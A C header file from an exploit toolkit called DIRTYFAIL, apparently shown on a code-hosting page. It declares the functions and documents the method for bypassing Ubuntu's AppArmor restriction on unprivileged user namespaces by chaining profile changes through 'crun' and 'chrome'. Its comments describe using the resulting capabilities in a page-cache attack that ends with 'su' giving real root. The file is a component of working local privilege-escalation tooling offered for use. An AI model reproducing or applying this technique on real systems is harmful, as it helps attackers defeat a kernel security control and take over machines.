114 lines
5.1 KiB
C
114 lines
5.1 KiB
C
/*
|
|
* DIRTYFAIL — apparmor_bypass.h
|
|
*
|
|
* Defeat Ubuntu's `apparmor_restrict_unprivileged_userns=1` policy.
|
|
*
|
|
* The default Ubuntu apparmor profile applied to unprivileged programs
|
|
* lets `unshare(CLONE_NEWUSER)` succeed but **strips CAP_NET_ADMIN**
|
|
* inside the new namespace — so XFRM SA registration, raw sockets, etc.
|
|
* fail downstream even though we appear to be uid 0 in our userns.
|
|
*
|
|
* The bypass: switch to a permissive AppArmor profile (`crun`, `chrome`,
|
|
* etc.) via `change_onexec` *before* unshare. Those profiles don't
|
|
* carry the userns-cap-strip rule, so the kernel hands us the full
|
|
* effective set inside the new namespace.
|
|
*
|
|
* Mechanics — three stages, two re-execs:
|
|
*
|
|
* stage 0 (entry): change_onexec(crun); execv(self, AA1, ...args)
|
|
* stage 1 (in crun): change_onexec(chrome); execv(self, AA2, ...args)
|
|
* stage 2 (in chrome): unshare(USER|NET); maps; capset; ambient caps;
|
|
* re-enter normal main() flow with bypass marked
|
|
*
|
|
* The two-hop dance is what `aa-rootns` (Brad Spengler / 0xdeadbeef)
|
|
* demonstrated. The "chrome" hop is technically optional — the "crun"
|
|
* profile is already unconfined for our purposes — but the second hop
|
|
* defeats some hardened policies that audit chained execs.
|
|
*
|
|
* Detection of "do we need the bypass?" is best-effort:
|
|
* - read /proc/self/attr/current; if it ends with " (enforce)" and
|
|
* mentions "unprivileged_userns", we're being restricted.
|
|
* - or: probe by spawning a child that does unshare(CLONE_NEWUSER)
|
|
* and tries `ip link add type dummy` — if that fails with EPERM,
|
|
* the caps were stripped.
|
|
*/
|
|
|
|
#ifndef DIRTYFAIL_APPARMOR_BYPASS_H
|
|
#define DIRTYFAIL_APPARMOR_BYPASS_H
|
|
|
|
#include "common.h"
|
|
|
|
/* Stage markers used as argv[1] to route re-execs. */
|
|
#define AA_STAGE1_TAG "DIRTYFAIL-AA-STAGE-1"
|
|
#define AA_STAGE2_TAG "DIRTYFAIL-AA-STAGE-2"
|
|
|
|
/* Returns true if `argv[1]` is one of the AA-* stage markers, in which
|
|
* case main() should hand control to apparmor_bypass_run_stage(). */
|
|
bool apparmor_bypass_is_stage(int argc, char **argv);
|
|
|
|
/* Execute the appropriate stage based on argv[1]. This either re-execs
|
|
* self (stage 1) or returns the modified argv after unshare+caps setup
|
|
* for the caller to continue with (stage 2). The function does not
|
|
* return on stage 1 (always execv). On stage 2, returns 0 on success
|
|
* and writes the caller's continuation argv to *out_argc / *out_argv. */
|
|
int apparmor_bypass_run_stage(int argc, char **argv,
|
|
int *out_argc, char ***out_argv);
|
|
|
|
/* Probe: does this process actually need the bypass to gain
|
|
* CAP_NET_ADMIN inside a fresh user namespace? Returns true if YES. */
|
|
bool apparmor_bypass_needed(void);
|
|
|
|
/* True iff stage 2 of the bypass ran successfully in this process —
|
|
* i.e. we're now inside a fresh user/net namespace with full caps,
|
|
* and any further unshare() would nest. Exploit modules check this
|
|
* before deciding whether to fork+unshare on their own. */
|
|
bool apparmor_bypass_was_armed(void);
|
|
|
|
/* Probe whether the bypass actually grants caps on this kernel.
|
|
* Forks a child that does unshare(USER) and tries to write to
|
|
* /proc/self/setgroups; if that fails with EPERM, we're on a kernel
|
|
* (Ubuntu 26.04+) that auto-transitions to the unprivileged_userns
|
|
* sub-profile and denies caps regardless of bypass technique.
|
|
*
|
|
* Returns true if unprivileged userns is COMPREHENSIVELY blocked
|
|
* (the bug class is unreachable for unprivileged users). Returns
|
|
* false if userns operations work normally OR if AA isn't loaded
|
|
* at all (in which case `apparmor_bypass_needed()` would also
|
|
* return false).
|
|
*
|
|
* This is the right signal for `--scan` to report "VULNERABLE in
|
|
* kernel but LSM-mitigated" vs plain "VULNERABLE".
|
|
*/
|
|
bool apparmor_userns_caps_blocked(void);
|
|
|
|
/* Fork a child that arms the AA bypass and re-execs itself through
|
|
* the stages. The child eventually lands inside a fresh user/net
|
|
* namespace with full caps; main() in that re-exec'd image dispatches
|
|
* to the inner-mode handler indicated by the DIRTYFAIL_INNER_MODE
|
|
* environment variable.
|
|
*
|
|
* The PARENT stays in the init namespace and waits for the child via
|
|
* waitpid. After the child exits, the parent can read the global
|
|
* page cache (which reflects whatever the child modified) and then
|
|
* execlp("su", ...) in init namespace to reach REAL init-ns root —
|
|
* this is the whole point of the outer/inner split.
|
|
*
|
|
* Caller must setenv("DIRTYFAIL_INNER_MODE", "...", 1) and any other
|
|
* mode-specific env vars BEFORE calling this. The child inherits the
|
|
* full environment.
|
|
*
|
|
* Returns the child's exit code on success. -1 on fork failure. */
|
|
int apparmor_bypass_fork_arm(int argc, char **argv);
|
|
|
|
/* Trigger the bypass: change_onexec(crun) then re-exec self with stage
|
|
* markers. Caller passes the argv it wants to resume with (stage 2 will
|
|
* hand that argv back via apparmor_bypass_run_stage's out_argv).
|
|
*
|
|
* Does not return on success (control transfers to the new process
|
|
* image). Returns -1 with errno set if the change_onexec or execv
|
|
* failed; in that case the caller may continue without bypass and let
|
|
* downstream syscalls fail loudly. */
|
|
int apparmor_bypass_arm_and_relaunch(int argc, char **argv);
|
|
|
|
#endif
|